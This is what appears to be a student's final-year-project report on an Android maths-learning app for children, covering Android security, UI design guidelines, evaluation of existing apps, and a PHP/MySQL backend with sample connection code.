was primarily designed for touchscreen mobile devices such as smartphones and tablets. Android provides an open platform to developers for creating their own applications for use by various mobile devices. While Android is currently developed by Google, it was not originally created by them. Android Inc. was a start-up company who were working on new software for smartphones. Google bought Android. Inc in 2005 and were ready to release their first android device in late 2008. The different components of Android are designed as a stack. Android 'Applications' form the top layer of the stack. The Linux kernel forms the bottom layer. All applications are written in the Java programming language. The application architecture is designed to simplify the reuse of components. The capabilities of any application can be published and then be made use of by other applications. Android includes a set of core libraries that provides most of the functionality available in the core libraries of the Java programming language. Applications can call upon any of its phones core functionality such as making calls, sending text messages, or using the camera. These provide the functionality needed to build quality mobile applications. Android relies on Linux for core system services such as security, memory management, and process management. The recommended Android development environment is the Eclipse IDE. An ADT(Android development Tools) plug-in is available for Eclipse. This extends the capabilities of Eclipse to allow new android projects be created. It can create applications UI's, debug applications using the Android SDK tools, as well as export .apk files allowing distribution of applications. The Android SDK(Software development kit) provides the API libraries and tools necessary for Android development. Android allows developers to combine information from the web with data on the phone to provide a more relevant, innovative user experience. Since Android is open source, it can be extended to incorporate new technologies as they emerge. As developers continue to build innovative mobile applications, the Android platform will continue to evolve. By the end of 2011, more than 200 million Android devices had been activated around the world, with an estimated 555,000 devices being activated each day. These figures show that Android is quickly catching up with apple's ios platform. However most reports show that Android is the dominant smartphone. Data from the third quarter of 2012 showed that Android has 75% of market share of smartphones. 2.6 Designing, Developing, and Using Secure Mobile Applications Developing mobile applications and their corresponding mobile web Services is quite different from developing traditional Web-services and desktop-oriented applications, due to the limited available resources (CPU, memory, battery, etc), and communications aspect (connection availability, security, etc.). Before mobile applications can be adopted at a large scale and for heavy transactions, there are plenty of technical aspects that have to be addressed. Transaction-related data should always be accessible to mobile applications. This accessibility is mainly affected by three factors: 1. Availability of connections between mobile applications and mobile Web services, 2. Available bandwidth, and 3. Network latency If there are no connections, data should be stored locally. As soon as a connection is available, both offline transactions and data must be updated and committed. Optimizing the transfer of data means deciding how much data should be located on the device and how much data should travel back and forward between the applications and the mobile web service The main problem that rises is how to decide which data to keep remote and which to bring to the mobile device. Decision criteria include available resources, cost of storage, cost of communication, significance and sensitivity of data, security and cost and benefits of compression. Because of this, developers need to consider a number of issues when developing an application. How to present the User Interface? How to support offline operations? How to deal with limited bandwidth? How to hide high and unpredictable latency? How to ensure security? How to ensure browser's compatibility? How to decide on local or remote computation? How to adapt mobile Web services? To solve these issues the following framework could be applied. The framework involves two main participants: the mobile client environment, and the backend server/mobile Web service. The backend server consists of eight components: Enterprise Web Applications: integrate functionality from remote Servers Business Logic: represents the core of the mobile application that exposes functionalities. Content Management System: A System to manage different contents and data. This includes importing creating updating and removing content to/from the mobile application. Workflow and profile management: manages the flow of data between the mobile application and the backend server and adapts the mobile application features and interface to different user's profiles. User management: allows management of different types of users with different levels of access. Database: used to store data about objects and content Web Services: web components that can be deployed on backend server and can n be invoked by the mobile application. Document Repository: is used to store different types of documents. The mobile client environment consists of six components: Business logic: it may be necessary to use some of the business logic on th application itself(e.g. if it is offline). Secure Layer Interfaces: handles secure user authentication. Provides different interfaces for different user's profiles. Mobile Application API's: a set of libraries that implement a set of utilities that that may be required by the mobile application. User Interface: This is the GUI components that mobile clients use to access different services. Data Storage: the place where persistent data is stored. Browser: used to display web content 2.7 Android Security: Since my application will contain some personal information about children through their profiles, security is an important issue to consider. Parents and teachers will not feel comfortable allowing children to use an application which does not keep students information safe. Android uses a simple permission label assignment model to restrict access to resources and models. Several refinements have been added to the System as it evolved. In the Android application framework, developers must design applications in terms of components. The frame-work doesn't have a main() function or a single point of entry. Android defines four component types: Activity components, Service components, Content provider components, and Broadcast receiver components. Activity components define an applications user interface. Usually, one activity is defined per "screen". Activities start each other, and can pass in/return value. For example, Facebook allows the use of the camera app to upload photos. Service components perform background processing. If an activity needs to perform an application after the user interface disappears, it can start a service specifically designed for that action. Content provider components store and share data using a relational database interface. Each content provider has an associated "authority" describing the content it contains. Broadcast receiver components act as mailboxes for messages from other applications. Application code often broadcast messages to an implicit destination. Broadcast receivers subscribe to such destinations to receive the messages sent to it. Application code can also address a broadcast receiver explicitly by including the namespace assigned to its containing application. The primary mechanism for component interaction is an 'intent'. An 'intent' is a message object containing a destination component address and data. The Android API defines methods that accepts intents and uses this information to start activities, services, and broadcast messages. (startActivity(Intent), sendBroadCast(Intent)). The invocation of these methods tells the Android framework to begin executing code in the target application. This process is known as an Action.(An intent object defines an "intent" to perform an "action"). Android protects applications and data through a combination of two enforcement mechanisms, one at System level and the other at the inter-component communication (ICC) level. ICC mediation builds on the guarantees provided by the underlying Linux System, and is the main focus of this article. Each application runs a unique user identity which lets android limit the potential damage of programming flaws. This means that to each component is restricted by assigning it an access permission label. Developers assign applications collection of permission labels. When a component initiates ICC, a reference monitor looks at the permission labels assigned to its containing application and, if the target components access permission label is in that collection, allows ICC establishment to proceed. If the label is not in that collection, then establishment is denied. The developer assigns permission labels via the XML manifest file that accompanies every application. This defines the applications security policy. Assigning permission labels to an application specifies its protection domain whereas assigning permissions to the components in an application specifies an access policy to protect its resources. All permission labels are set at install time. Several Refinements have been made to the basic Android security model as the system evolved Applications often contain components that another application should never access. Instead of defining an access permission, the developer could make a component private. By making a component private, the developer doesn't have to worry which permission label to assign it or how another application might acquire that label. The developer of an activity can decide not to assign an access permission to it. If a public component doesn't explicitly have an access permission assigned to it, any application can access it. While this supports the reuse of functionality it can lead to poor security practice. Unprotected intent broadcasts can unintentionally leak information to explicitly listening attackers. The Android API for broadcasting Intents optionally allows the developer to specify a permission label to restrict access to the intent object. Some system resources (camera, microphone, etc) are accessed through the direct API access rather than through components. Android protects these APIs with additional permission label checks. An application must declare a corresponding permission label in its manifest file to use them (e.g. declare the INTERNET permission label). There are four protection levels for permission labels in Android. "Normal" permissions are granted to any application that requests them in its manifest. "Dangerous" permissions are granted only after user confirmation. "Signature" permissions are granted only to applications signed by the same developer key as the package defining the permission. "Signature or System" act like 'signature, and exist for compatibility with the older Android system. 2.8 UI DESIGN GUIDELINES There are a number of guidelines that should be followed when designing a user interface for a mobile application: Enable Frequent Users to Use Shortcuts Since time is often a key factor for the user, reducing the number of operations required to perform regular tasks is an important part of the design process. This will increase the speed of interaction between the user and the system. Offer Informative Feedback. For every operation by the user, there should be some system feedback. The feedback should be both informative and understandable. Support Internal Locus of Control It is important that the user feels like they are in control of the system. Mobile Applications should be designed so that they respond to the users' actions rather than controlling them. Consistency Users may need to switch between mobile devices and it is important that consistency is maintained between all devices, across multiple platforms. Reversal of Actions Reversing an action and returning to a previous state can be a challenging process for a mobile application to achieve due to the limited memory and computing power available. Error Prevention and Simple Error Handling Error prevention need be aware of the physical attributes of mobile devices. Many of these devices have very small buttons which are in close proximity to each other. This can cause problems for users. Error handling is very important given the pace of events on mobile devices. Reduce short-term memory load Often while using a mobile device, the user will not be 100% focused on the application. Interfaces should be designed so that the user does not need to memorize anything in order to complete the task. Design for multiple and dynamic contexts There are often other distractions vying for a user's attention when using mobile applications. Environmental conditions or the presence of other people can alter how a user interacts with the device. It is important to allow for different operation to be implemented in various contexts. By implementing context awareness and self-adapting functionalities, the usability of the application will be increased. Design for Limited and Split Attention Since a mobile application may not be the focal point of the user's current activities, it is important to design an interface which requires as little attention as possible to use. Design for speed and recovery Time constraints need to be taken into account when designing a mobile application. Users may need to quickly access other applications. When this happens, the users work will need to be saved quickly and securely for later use. Allow for personalization Different users may have different preferences and skill levels, when it comes to using an application. It is important to allow for variation and personalization of the application for things such as backgrounds or font sizes. Design for Enjoyment Aesthetics is also an important aspect in the design of a user interface. Colour is important for visual interfaces and can help invoke a positive response from the user, 2.9 Evaluation of existing apps Before I began to design my Application I wanted to evaluate some of the educational apps which were already on the Google Play store. I felt that this would give me some good ideas for designing my own application. I evaluated the applications based on the guidelines discussed in section 2.7. This was a beneficial exercise as it showed me some features which I could implement in my own design and also showed me some features which should be avoided. It also gave me some good ideas relating to the layout and structure of my application. I had to consider how I would design my application so that it would be an improvement on existing applications. The first application I looked at was called 'Multiplication Tutor' which aims to help 'Learn and Practice Multiplication Tables'. The first thing I noticed was that the background of the main menu seemed dark and cluttered. It is not obvious to the user which option to take to begin using the application. Another drawback of the application is that you have to push a 'next' button to get to the next question. This should be done automatically when a correct answer is given. There is no constructive feedback given. The user is only told if he/she is correct or incorrect. The next application I looked at was 'Kids Numbers and Math' which is described as 'A fun way for kids to learn numbers and build basic math skills'. This application was aimed at pre-school children to learn basic maths skills. Any child using this application needs to be registered by a parent/guardian. This allows the parent/guardian to track the progress of the child. Feedback about each child is given in the 'parents centre'. Users can also play as a guest. This application has a bright colourful background which is easy to focus on. The final application I am evaluating is 'Learn & Fun for Kids' which is described as 'Possibly the best and most complete educational game for Android'. This application doesn't just focus on Maths but teaches the alphabet, shapes and colour as well. On the home screen I found that the buttons did not stand out and it was not clear what option to take. A positive feature of this application is that it allowed for personalization of backgrounds and background music. The application also keeps track of the high scores achieved by the user. Screenshots of evaluated Apps Multiplication Tutor MT1.jpg MT2.png Kids Numbers and Math KM1.jpg KM2.jpg Learn & Fun for Kids FFK1.jpg FFK2.jpg Chapter 3-Design and Implementation Once I had completed my research and decided on a concept my application, I began to think about its design. The Android developer guide gives some guidelines on mobile application design. 3.1 Screen Navigation Design According to the official Android developer guide, 'One of the very first steps to designing and developing an Android application is to determine what users are able to see and do with the app'. With this in mind I started to plan out the high level screen hierarchy of my application. I began by deciding on the set of screens which would be needed to allow users to view and interact with the application correctly. The set of screens I decided on were: Home Page Screen This page will contain the applications home menu. Play Screen This is the screen the user will see when playing a game. Practice screen This is screen that the user will see when practicing the game Help Screen If a user requires help in a practice game, this screen will appear. Instructions Screen This Screen will show the user how the game works Log-in Screen This screen will allow the user to log-in to his/her account Set-up Account Screen This screen will allow a user to create a user account User Menu Screen This Menu allows the user to play/practice while logged in, as well as the option to view their statistics to date. This screen also allows the user to log out. User Statistics screen This screen will show the user statistics from their previous games Score Screen This screen tells the user what score they got in their precious game and allows them to return to the User Menu Screen Once I had decided on the screens, I defined the relationships between them in a screen map. This allowed me to see how the different components of the application would interact with each other. DSC_0663.JPG/ The next part of the design process was wireframing. This involved sketching the layout of each screen by hand. At this early point in the process, precision was not important. However, drawing these rough sketches gave me a better understanding of how the users would interact with the application as well as making me consider the practicality of my original screen map design. Home Menu Account Screen Log-in Screen DSC_0665.JPG DSC_0666.JPG DSC_0667.JPG Set-up Account User Menu Play Screen DSC_0668.JPG DSC_0669.JPG DSC_0670.JPG Practice Screen Help Screen Instructions Screen DSC_0671.JPG DSC_0673 (1).JPG DSC_0674.JPG Score Screen Statistics Screen DSC_0674.JPG DSC_0675.JPG Once I had these screens designed, I was able to start writing code. While the screen design was not final, it gave a good basis to begin implementation, and allowed for refinement at a later stage. 3.2 Database design A key requirement for my Android application was the ability to keep track of a users details and scores. This meant that I needed a database storing this information, which an android device could connect to, retrieve data from, and update user information on. Since Android cannot connect directly to a database server, I had to create a PHP API which carries out operations on the database, and returns a response to the Android application. All data will be transferred between the databases to the Android device in JSON format. JSON is a format for storing and transferring text information. The first step in designing my database was to set up a web server which would host the required tables, as well as the PHP API. For my project I felt that a WAMP server would work well. WAMP stands for Windows, Apache, MySQL and PHP. It provides an environment for developing applications with PHP and MySQL on a Apache web server. I created a simple database with only one table to store information from the application. The 'user_details' table contained columns representing the users' username, password, the number of games played, the users' average score, and the users' high score. I created the 'user_details' table using a MySQL 'Create' query. Once my database was created, I created two PHP classes which would be used to connect to the database. The class 'db_config.php' contained the variable required to open a connection with the database. The class 'db_connect.php' imported the variables from 'db_config.php' and used these variables to open a connection with the database. db_config.php <?php define('DB_USER', "root"); // db user define('DB_PASSWORD', "********"); // db password define('DB_DATABASE', "fyp"); // database name define('DB_SERVER', "localhost"); // db server ?> db_connect.php <?php class DB_CONNECT { // constructor function __construct() { // connecting to database $this->connect(); } // destructor function __destruct() { // closing db connection $this->close(); } /** * Function to connect with database */ function connect() { // import database connection variables require_once __DIR__ . '/db_config.php'; // Connecting to mysql database $con = mysql_connect(DB_SERVER, DB_USER, DB_PASSWORD) or die(mysql_error()); // Selecing database $db = mysql_select_db(DB_DATABASE) or die(mysql_error()) or die(mysql_error()); // returing connection cursor return $con; } /** * Function to close db connection */ function close() { // closing db connection mysql_close(); } } ?> Having established a connection to the database I needed to create PHP classes which would perform different operation on the table in my database. The first operation I needed to perform was to create new users. The 'create_user.php' class connects to the database using 'db_connect.php', before inserting a new row into the 'user_details' table. When there is a problem inserting a row into the table the class returns an error specifying the problem. create_user.php There were still a number of operations which I would need carried out on my database. To meet the requirements of the game, the 'user_details' table would need to be updated regularly so that the users' statistics will be updated. I solved this issue by adding more classes to the PHP API. My 'get_user_details.php' class is used to get the information required in the games statistics screen. 'update_user.php' is used to update a row relating to a particular user, and 'get_highscore.php' is used to get a particular high score get_highscore.php get_user_details.php. update_user.php 3.3 Game Development There were a number of different areas to for me to consider while developing this game. I had to develop the core functionality of the game, such as generating questions, calculating the correct answer, keeping track of scores, providing help in the practice section of the game, and allowing for different levels of difficulty in the game. I had to ensure that the screen layout and UI components were consistent with the original design of the game as shown in section 3.1, without compromising the core functionality. I also had to integrate the remote web server, and the PHP API (discussed in section 3.2) with my application. 3.3.1 Generating Maths Questions. In order for the application to meet its requirements I had to develop a solution which generated random questions for various levels of difficulty. To achieve this I implemented the state design pattern. The state design pattern allows objects to change their behaviour depending on internal state. I utilised this pattern as it would allow the application to generate different questions depending on the difficulty level chosen. I created a 'PlayLevel.java' class which contained a number of different internal states, each representing a different level of difficulty. My 'PlayState.java' class defined an common interface for the various levels, encapsulating the behaviour of the various levels. When 'PlayLevel.java' changed state, it had a different level associated with it, causing a different set of questions to be generated. PlaysState.java BeginnerLevel.java PlayLevel.java(sample section of the class) Another challenge that I faced was keeping track of what question the user is on and keeping track of their current score. Keeping track of the question was of particular importance in the practice section of the game. If a user got a question wrong, and required help from the help section, it was important that they attempted to answer the same question again afterwards. If the game generated a new question in the practice section after offering help to the user, then the user would not improve their learning skills. To solve this issue I utilised Androids Application class. The Application class allows an object to maintain a global application state. This meant that I could keep track of game details, even when the application was moving between different activities. I created a 'BuzzBangApp.java' class which extended the Android Application class. 'BuzzBangApp.java' contains a 'Game' object, which keeps track of the current Question and current score. Every time the user starts a new game, a new 'BuzzBangApp' object is created. BuzzBangApp.java Game.java(Section of code from class 3.2.2 Connecting application to the Database One of the main requirements of the game is that it can keep track of a user's progress and scores. As seen in section 3.2, Android applications cannot connect directly to a database server, and to solve this error I need to create a PHP API which would pass data between the Android application and the database server. In section 3.2, I gave an example of the create_user.php class which can add a new row to the user_details table. In order to link the application to the database I needed to create a 'NewUserActivity.java' class which would connect to the database through 'create_user.php'. The NewUserActivity.java class will receive user data, and pass this data onto the create_user.php class. NewUserActivity.java will then receive a response stating if the new user was successfully created or not. NewUserActivity.java3.3.3 Creating Screen Layouts According to the official Android developer guide, "A Layout defines the visual structure for a user interface" (). Android allowed me design my screens using simple xml classes. It is relatively straightforward to instantiate these screen layouts at runtime and integrate the back-end code with the user interface. I demonstrate my implementation of xml screen layout in the section 3.4 of this report where screenshots of my project are displayed. Each screen that I created was done using XML classes. 3.4 Screenshots of my application. Home Menu Account Screen Log-in Screen DSC_0665.JPG DSC_0666.JPG DSC_0667.JPG Play Screen Practice Screen Help Screen DSC_0671.JPG DSC_0673 (1).JPG DSC_0674.JPG New User Screen DSC_0671.JPG Chapter 4 Evaluation 4.1 Evaluation of my application In section 2.7 of this report, I outlined some use User Interface guidelines that all mobile applications should follow. These were: Enable Frequent Users to Use Shortcuts Offer Informative Feedback. Support Internal Locus of Control Consistency Reversal of Actions Error Prevention and Simple Error Handling Reduce short-term memory load Design for multiple and dynamic contexts Design for Limited and Split Attention Design for speed and recovery Allow for personalization Design for Enjoyment In this section I will evaluate my own application based on these guidelines. Enable Frequent Users to Use Shortcuts: The application is quite straight forward to navigate through, and the number of operations required by the user to start a game is minimal. There is currently no option to quit in the middle of a game and return to the menu. This is a shortcut which should be added to improve user experience. Offer Informative Feedback: The application gives the user feedback at the end of every round as the user is shown his/her scores immediately. The user receives feedback in the practice section. If they get a question wrong they will be shown the help screen straight away. The statistics screen also gives the user feedback on their previous scores. Support Internal Locus of Control: Users will feel as though they are in charge of the application. The application will only respond to the users actions, giving them full control. Consistency: Consistency across platforms is not supported in this application as it has only been developed for the Android platform. Reversal of Actions: Reversal of action is not provided in the test section of the game. This is to stop users from changing their answers if they get a question wrong. Reversal of action is provided in the practice section. After being shown the help screen, Users are brought back to the previous question. Error Prevention and Simple Error Handling: The application will check if the Android device is connected to the internet/ has 3G coverage. If the device is not connected then the user will not be able to log in or create a new user account. The user will instead be brought back to the main menu. Reduce short term memory load: The user does not have to memorise much about the application as long as he/she understands how the game works. Design for multiple and dynamic contexts: Even if users get distracted while playing a game, they will be able to return to the question they were on. Design for limited and split attention: The applications interface does require a lot of attention while playing, as there are a number of different numbers and answers that need to be considered. The interface could be improved, to make it a more intuitive game. Design for speed and recovery: At the moment, the users details are only updated after every round. If the users game is interrupted suddenly, the users progress will not have been saved. Allow for Personalisation: The application does not have different preferences available for different users to choose from. It does allow for users of different skill levels. Design for enjoyment: While the colour scheme of the game screen is bright, overall the application needs more work on the aesthetics of the screens. 4.2 Evaluation of the FYP process Overall I found the Final Year Project quite challenging. From the amount of research that was involved, deciding which technologies to use and learning how to use them, the design and implementation of the software, and documenting my work in a report, the project was a huge workload. However, looking back on the whole process, there are some things that I feel I could have managed better, which would resulted in an improved performance and end product. I spent the first 2/3 months doing research on different aspects of education, learning styles and mathematics. I also completed some basic Android development online tutorials in this time. My primary focus though was on education based research. While this was very important, I should have put more time into Android development. The tutorials I completed gave me a good foundation in Android development, but they did not prepare me for some of the more technical issues I faced during development of the Application (server-side issues). If I had come across these issues earlier in the FYP process, I would have been better equipped when I began development of the application. I felt that I had a good relationship with my FYP supervisor. After any of our meetings I always knew what parts of the project needed to be improved, and what I should focus my time on. On reflection I should have kept him informed of any progress I was making more often than I did. The FYP process was successful in getting me to work throughout the year. Having various deadlines for presentations, interim reports, etc…, helped me to focus and start work earlier than I would have otherwise done. Chapter 5 Achievements and conclusion 5.1 Summary of achievements I feel like I achieved a great deal by working on this project. It was by far the largest, most difficult project I have attempted to complete. I developed a range of skills during the course of the project which had not been covered in my Computer Systems course. My research skills improved a lot, and I learned the importance of basing design decisions on established findings. Having had no interest in the topic before the FYP, I found the research into various educational topics quite interesting. I think that the area of ICT in education is going to grow and grow in the coming years. I developed my programming skills during the implementation of my application. Even though I had no previous experience of Android development, I thought that the skills that I had developed in my course made the switch to Android development much easier to do. I learned several new technical skills while working on my FYP, which will benefit me in the future. The experience I gained from setting up a database server, then connecting it to an Android device using the PHP API that I created was excellent. A major achievement from the FYP was having a working version of my application to show to people on demo day. Some of the feedback I got during the demo day was really nice to hear 5.2 Future Work There are a number of areas that I believe could improve the application. I intend to implement the following changes over the summer and put the application up on the Google Play store. Add an instructions section to the App that explains how the game works Improve the help screen of the practice section so that it emphasises step-counting techniques rather than showing the times table. Add a classroom feature so that teachers could monitor their students' progress Fix any remaining problems regarding updating the database. Design a more intuitive game screen so that the game feels nicer to play Design a suitable version of the application for tablets.
https://www.ukessays.com/essays/computer-science/teach-me-maths-android-application-computer-science-essay.php
CC-MAIN-2017-09
refinedweb
8,367
54.73
y4m-d 1.0.1 File loader/emitter for Y4M, a convenient uncompressed video format. To use this package, put the following dependency into your project's dependencies section: What's this? y4m-d is a tiny library to load/save Y4M video files. Y4M files are the simplest uncompressed video files that also contain meta-data (width, height, chroma subsampling, etc...) which makes a better solution than .yuv files. High bit-depth are supported with any depth from 8 to 16 bits/sample. However y4m-d does not handle endianness or shifted bits in samples. Frames are read/written as is. libavformat uses native endian for both reading and writing and align significant bits to the left. This means the Y4M format depends on the producer machine. So until probing is implemented it's up to you to take care of this. Licenses See UNLICENSE.txt Usage import y4md; void main(string[] args) { auto input = new Y4MReader("input-file.y4m"); writefln("Input: %s %sx%s %sfps %s bits/sample", inputFile, input.width, input.height, cast(double)(input.framerate.num) / (input.framerate.denom), input.bitdepth); ubyte[] frameBytes; while ( (frameBytes = input.readFrame()) !is null) { // Do something with frame data in frameBytes[] } // Output a 1920x1080p25 8-bit stream in stdout auto output = new Y4MWriter(stdout, 1920, 1080, Rational(25, 1), 8); frameBytes = new ubyte[output.frameSize()]; for (int i = 0; i < 100; ++i) { // write something in frameData... output.writeFrame(frameBytes[]); } } - Registered by ponce - 1.0.1 released 3 years ago - p0nce/y4m-d - github.com/p0nce/y4m-d/ - public domain - Authors: - - Dependencies: - none - Versions: - Show all 7 versions - Download Stats: 0 downloads today 0 downloads this week 0 downloads this month 262 downloads total - Score: - 0.2 - Short URL: - y4m-d.dub.pm
https://code.dlang.org/packages/y4m-d
CC-MAIN-2019-26
refinedweb
291
51.44
- 1Step 1 Simblee App, Arduino IDE, and Driver Setup - 2Step 2 Create Simblee Application This is the heart of this project, a mobile device app programmed on the Simblee. The following is the code for creating a user interface to control the Simblee IO pin. Include the SimbleeForMobile.h Library #include <SimbleeForMobile.h> Define Relay Pin The pin numbering on the Simblee breakout is 0-6. I recommend using one 2-6 as 0 and 1 are used for the serial port. #define RELAY_PIN 4 Create a Global ID Variable We will need a place to store the ID of the switch object in the user interface. It needs to be of global scope. int switchID; Setup Setup the RELAY_PIN for digital output and start the SimbleeForMobile library using the begin() function, a very important step! void setup() { pinMode(RELAY_PIN, OUTPUT); SimbleeForMobile.begin(); } Loop The Simblee loop() routine is very different from what we are used to seeing with Arduino programs. The SimbleeForMobile library uses callbacks to execute various parts of the program and the only required code is to call the process() function every time through the loop(). Placing additional code in the loop will not break this, but it may slow down the responsiveness of the app. Especially avoid long delay() calls. void loop() { SimbleeForMobile.process(); } User Interface Now we program the UI. The entire ui() routine is bookended by the beginScreen and endScreen functions. Everything placed between these will be drawn on our screen. This app uses only two elements, text and a switch. The text will simply serve as a label for the switch and the switch will control the IO pin. void ui() { SimbleeForMobile.beginScreen(); SimbleeForMobile.drawText(70, 160, "OUTLET", BLACK, 24); switchID = SimbleeForMobile.drawSwitch(200, 160); SimbleeForMobile.endScreen(); }The parameters for the text are: (x_origin, y_origin, display string, color, size). The parameters for the switch are (x_origin, y_origin). The call to drawSwitch() returns the ID of that UI element, which is why we created the switchID variable. Connect the UI to the IO Finally, we can connect the user interface, specifically the switch, to the IO pin on the Simblee. This is achieved with the ui_event function. When the user toggles the switch on the screen, an "event" is triggered and the switchID is passed into this function. An "if" structure determines if the ID of the event that happened is the same as the switchID, and then toggles the IO pin to reflect the value of the switch, 1 or 0. void ui_event(event_t &event) { if (event.id == switchID) { digitalWrite(RELAY_PIN, event.value); } } The source code Arduino file is available in the files section of this project. - 3Step 3 Modify and Assemble Beefcake Relay Kit The SparkFun Beefcake Relay Kit comes in a ready-to-build kit. You can solder everything in place with the exception of one of the resistors. The kit uses a 2N3904 NPN transistor used to take the low-current, 5V control pin voltage and trigger a much higher current for flipping the mechanical relay. The 2N3904 requires 5mA on the base pin to drive the transistor into saturation (fully open) mode. So for a 5V control voltage, the beefcake relay kit places a 1k resistor on the base of the transistor and using Ohm's law, The only problem for us is that the Simblee is a 3.3V device. Using the same math as above, we see that the max current that the base of the transistor will get is 3.3mA. This results in very sporadic behavior on the relay. So we need to get that current up by replacing the 1k resistor with something smaller. Back to Ohm's law, Something very close to this value will work, a 680 for instance. Don't go too small, though. The Simblee is a very low current device, rated for 5mA per pin and 15mA across all pins at any given time. Now go ahead and get the soldering iron hot. Some of those big pins on the relay will take some time to heat up, be patient. Pay close attention to the placement of the diode, too. Direction definitely matters with those. This picture shows the 680 ohm resistor farthest from the relay body. - 4Step 4 Wire Relay and Outlet See SparkFun Tutorial for this bit. - 5Step 5 Put It All Together Assemble the Simblee, battery pack, 3.3V regulator, capacitor, and relay as such: - The battery connects to the vertical rails shown on the left of the breadboard. VCC to red, GND to black. - The bypass capacitor is in parallel with the battery, connected to both VCC and GND. Orientation matters for electrolytic caps! (Black stripe is GND). - Check the datasheet for the voltage regulator you select, the one I used from SparkFun has the middle pin as the 3.3V (Vout). This is the yellow wire. - Power the Simblee with the 3.3V wire (NOT battery VCC) and GND to GND. - Connect the relay voltage pins to the battery rails and the control (white wire) to GPIO 4 on the Simblee. Note: I don't show the relay connected to the outlet in this picture, follow the SparkFun tutorial for that part! - 6Step 6 Put It In a Box - 7Step 7 Use It! Discussions Become a Hackaday.io Member Create an account to leave a comment. Already have an account? Log In.
https://hackaday.io/project/10694/instructions
CC-MAIN-2021-10
refinedweb
898
75
(converted from "answer" to importing-maps-to-basecamp-macto a new "question") Hi guys, I am for days trying to import a Topomap (Topohispania = Topo of Spain) into my Basecamp (Mac OSX El Capitan). I download it but it does not show up neither in Mapmanager nor in Basecamp. I also tried to change the filename from .gmapi to .gmap but does not help. I seems to import but does not show up. asked 20 Jan '18, 19:26 Gasvikingo 11●1●1●2 accept rate: 0% converted to question 20 Jan '18, 23:49 aseerel4c26 ♦ 32.3k●16●241●553 did work importing maps before? where did you download the "Topomap"? How did you try to import (which steps/actions)? This page gives a few hints that may help: Once you sign in you will be able to subscribe for any updates here Answers Answers and Comments Markdown Basics learn more about Markdown This is the support site for OpenStreetMap. Question tags: import ×184 basecamp ×33 mac ×25 gmapi ×2 question asked: 20 Jan '18, 19:26 question was seen: 1,351 times last updated: 21 Jan '18, 02:29 How do I add osm North America to Garmin' BaseCamp? Importing maps to BaseCamp Mac Why dont roads show up on OSM map in base camp?!
https://help.openstreetmap.org/questions/61740/trying-to-import-a-topomap-into-basecamp-mac-osx-but-it-does-not-show-up
CC-MAIN-2021-17
refinedweb
217
79.9
Welcome to a Flask tutorial covering a bit more about Jinja. We covered more of the Jinja basics earlier in this tutorial. This tutorial is a quick overview of the points I find to be most important from the Jinja documentation, that I have not yet covered in the earlier tutorials. Just like I recommend scrolling through the Bootstrap documentation once in a while, you should do the same here. First on our docket: Filters. I find myself using these very often. These are very similar to your str(), int(), and replace() commands in Python. For example, let's build a quick new page to run our Jinja samples through: __init__.py @app.route('/jinjaman/') def jinjaman(): try: return render_template("jinja-templating.html") except Exception as e: return(str(e)) Great, now we need the template: templates/jinja-templating.html {% extends "header.html" %} {% block body %} <body class="body"> <div class="container"> </div> </body> {% endblock %} This will be our start. Next, let's pass a few vars from our __init__.py file. @app.route('/jinjaman/') def jinjaman(): try: data = [15, '15', 'Python is good','Python, Java, php, SQL, C++','<p><strong>Hey there!</strong></p>'] return render_template("jinja-templating.html", data=data) except Exception as e: return(str(e)) Next, let's reference this data in our templates/jinja-templating.html file: {% extends "header.html" %} {% block body %} <body class="body"> <div class="container"> {% for d in data %} <p>{{d}}</p> {% endfor %} <hr> {% if data[1]|int > 10%} <p>True!</p> {% endif %} <hr> <p>{{data[2]|replace('good','FREAKIN AWESOME!')}}</p> <hr> {% for lang in data[3].split(',') %} <p>{{lang}}</p> {% endfor %} <hr> {{data[4]|safe}} </div> </body> {% endblock %} Sometimes, you may want to display raw Jinja code, you can do this with the raw tag, like so: {% raw %} {% for item in seq %} {{ item }} {% endfor %} {% endraw %} Next up, I would like to draw your attention to macros. {% macro input(name, value='', type='text', size=20) -%} <input type="{{ type }}" name="{{ name }}" value="{{ value|e }}" size="{{ size }}"> {%- endmacro %} The macro can then be called like a function in the namespace: <p>{{ input('username') }}</p> <p>{{ input('password', type='password') }}</p>. Next up, we're going to be discussing how to create dynamic links, which are called converters in Flask.
https://pythonprogramming.net/jinja-template-flask-tutorial/
CC-MAIN-2019-26
refinedweb
375
66.23
用法¶ 注解 This chapter assumes knowledge of the basic concept and difference between work functions and work chains is known and when one should use on or the other. A workflow in AiiDA is a process (see the process section for details) that calls other workflows and calculations and optionally returns data and as such can encode the logic of a typical scientific workflow. Currently, there are two ways of implementing a workflow process: This section will provide detailed information and best practices on how to implement these two workflow types. Work functions¶ The concept of work functions and the basic rules of implementation are documented in detail elsewhere: Since work functions are a sub type of process functions, just like calculation functions, their implementation rules are as good as identical. However, their intended aim and heuristics are very different. Where calculation functions are ‘calculation’-like processes that create new data, work functions behave like ‘workflow’-like processes and can only return data. What this entails in terms of intended usage and limitations for work functions is the scope of this section. Returning data¶ It has been said many times before: work functions, like all ‘workflow’-like processes, return data, but what does return mean exactly? In this context, the term ‘return’ is not intended to refer to a piece of python code returning a value. Instead it refers to a workflow process recording a data node as one of its outputs, that it itself did not create, but which rather was created by some other process, that was called by the workflow. The calculation process was responsable for creating the data node and the workflow is merely returning it as one of its outputs. This is then exactly what the workfunction function does. It takes one or more data nodes as inputs, calls other processes to which it passes those inputs and optionally returns some or all of the outputs created by the calculation processes it called. As explained in the technical section, outputs are recorded as ‘returned’ nodes simply by returning the nodes from the function. The engine will inspect the return value from the function and attach the output nodes to the node that represents the work function. To verify that the output nodes are in fact not ‘created’, the engine will check that the nodes are stored. Therefore, it is very important that you do not store the nodes you create yourself, or the engine will raise an exception, as shown in the following example: # -*- coding: utf-8 -*- from aiida.engine import workfunction from aiida.orm import Int @workfunction def illegal_workfunction(x, y): return Int(x + y) result = illegal_workfunction(Int(1), Int(2)) Because the returned node is a newly created node and not stored, the engine will raise the following exception: ValueError: Workflow<illegal_workfunction> tried returning an unstored `Data` node. This likely means new `Data` is being created inside the workflow. In order to preserve data provenance, use a `calcfunction` to create this node and return its output from the workflow Note that you could of course circumvent this check by calling store yourself on the node, but that misses the point. The problem with using a workfunction to ‘create’ new data, is that the provenance is lost. To illustrate this problem, let’s go back to the simple problem of implementing a workflow to add two integer and multiply the result with a third. The correct implementation has a resulting provenance graph that clearly captures the addition and the multiplication as separate calculation nodes, as shown in 图 15. To illustrate what would happen if one does does not call calculation functions to perform the computations, but instead directly perform them in the work function itself and return the result, consider the following example: # -*- coding: utf-8 -*- from aiida.engine import calcfunction, 